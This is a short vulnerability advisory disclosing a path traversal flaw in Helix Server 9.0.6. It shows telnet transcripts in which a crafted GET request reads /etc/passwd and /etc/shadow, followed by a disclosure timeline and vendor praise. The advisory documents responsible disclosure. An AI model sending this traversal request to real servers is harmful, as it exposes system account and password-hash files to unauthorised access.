RealNetworks Helix Server URI Traversal Arbitrary File Access

RealNetworks Helix Server URI Traversal Arbitrary File Access


Vendor: RealNetworks (http://www.realnetworks.com/)
Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Version: 9.0.6.1262

Exploit details:

$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
OPTIONS / RTSP/1.0

RTSP/1.0 200 OK
CSeq: 0
Date: Sat, 15 Mar 2008 00:28:48 GMT
Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible)
Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN
RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707
StatsMask: 3


Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
[..]
Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/shadow
root:HashedPasswdOMG:13885:0:99999:7:::
bin:*:13187:0:99999:7:::
daemon:*:13187:0:99999:7:::
adm:*:13187:0:99999:7:::
lp:*:13187:0:99999:7:::
sync:*:13187:0:99999:7:::
[..]
Connection closed by foreign host.
$

Timeline:

Reported to vendor: 2008-06-16
Vendor ack: 2008-06-16
Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2


Afterthoughts:

This was discovered during a vulnerability assessment. The client was running outdated
software. The vulnerability was actually discovered by Nessus, one of the web server
related plugins fired, tried a traversal and found this.

Real's response and immediate reply (mail, and then phone call with extensive
discussion) was very well handled. Kudo's to them for taking security seriously.